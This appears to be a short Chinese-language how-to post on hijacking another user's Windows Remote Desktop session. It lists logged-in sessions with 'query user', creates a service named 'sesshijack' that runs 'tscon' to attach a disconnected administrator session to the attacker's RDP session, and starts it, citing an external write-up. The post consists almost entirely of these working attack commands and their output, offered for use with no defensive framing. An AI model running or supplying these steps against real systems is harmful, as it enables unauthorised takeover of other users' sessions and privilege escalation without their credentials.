windows切换其他登陆用户

admin

查看用户:

1. C:\Windows\system32>query user
   
2. USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
   
3. administrator                             1  Disc            1  3/12/2017 3:07 PM
   
4. >localadmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM
   
5. C:\Windows\system32>

复制代码

创建服务：

1. C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
   
2. [SC] CreateService SUCCESS

复制代码

启动服务：

1. net start sesshijack

复制代码

细节：
http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html